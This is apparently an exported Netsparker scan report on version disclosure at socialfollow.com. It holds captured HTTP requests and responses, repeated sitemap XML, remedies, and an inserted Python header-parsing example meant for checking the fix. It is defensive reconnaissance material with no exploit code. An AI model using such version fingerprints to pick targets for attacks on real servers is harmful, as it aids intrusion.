<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response: it appears both in the Server header and in the X-Powered-By header. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. The attacker can also combine this information with other vulnerabilities in the application or the web server.
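The "Extracted Version" values reported for the Apache Version Disclosure and PHP Version Disclosure findings both come from tokenising the Server and X-Powered-By headers. The following is an added example, not code from the Netsparker report or from the target site: it splits those header values into product/version/comment tokens using the product-token grammar of HTTP (RFC 7231, simplified to unnested comments), collects every disclosed version, and offers a check that a hardened header names products only. The header values are a constructed copy of the ones captured below.

```python
"""Extract product/version tokens from Server and X-Powered-By headers.

Added example, not part of the Netsparker report. It reproduces the
"Extracted Version" values of the Apache and PHP disclosure findings from a
constructed copy of the headers captured in the report, and can be run
against the same headers after hardening to confirm the versions are gone.
"""
import re

# Constructed sample input: header values as captured in the report.
SERVER_HEADER = (
    "Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch "
    "mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8"
)
X_POWERED_BY = "PHP/5.2.4-2ubuntu5.12"

# product [ "/" product-version ] [ "(" comment ")" ]  (RFC 7231 section
# 5.5.3 grammar, simplified: comments are not nested, whitespace splits
# tokens, so free-text words such as "with" come back as versionless products).
_TOKEN = re.compile(
    r"([A-Za-z0-9!#$%&'*+.^_`|~-]+)"      # product name (tchar)
    r"(?:/([^\s()]+))?"                    # optional /version
    r"(?:\s*\(([^)]*)\))?"                 # optional (comment), e.g. the OS
)


def product_tokens(value):
    """Return [(product, version or None, comment or None), ...]."""
    return [(p, v or None, c or None) for p, v, c in _TOKEN.findall(value)]


def disclosed_versions(*header_values):
    """Map product -> version for every token that carries a version.

    The first version seen for a product wins, so the PHP string repeated
    in Server and X-Powered-By is reported once.
    """
    found = {}
    for value in header_values:
        for product, version, _comment in product_tokens(value):
            if version is not None:
                found.setdefault(product, version)
    return found


def is_minimal(value):
    """True when a header value names products only, with no versions or
    comments: what Apache emits with ServerTokens Prod ("Apache")."""
    return all(v is None and c is None for _p, v, c in product_tokens(value))


if __name__ == "__main__":
    print(disclosed_versions(SERVER_HEADER, X_POWERED_BY))
```

On the captured headers this yields Apache 2.2.8 with comment "Ubuntu" and PHP 5.2.4-2ubuntu5.12, matching the two findings, along with the mod_ssl, OpenSSL, mod_perl and Perl versions the report does not list separately. The fix is configuration rather than code: ServerTokens Prod and ServerSignature Off in the Apache configuration, and expose_php = Off in php.ini, which removes the X-Powered-By header entirely. After the change, is_minimal() on the new Server value should return True and disclosed_versions() should return an empty dict.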
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

PHP/5.2.4

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the OpenSSL version in the HTTP response. This information can help an attacker develop further attacks, and it can also make the system an easier target for automated attacks.

Impact

An attacker can look for security vulnerabilities specific to the identified version, and can also use this information in conjunction with other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

OpenSSL/0.9.8g

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the version of one of its Apache modules in the HTTP response. This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for security vulnerabilities specific to the identified Apache module version, and can also use this information in conjunction with other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

mod_perl/2.0.3

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
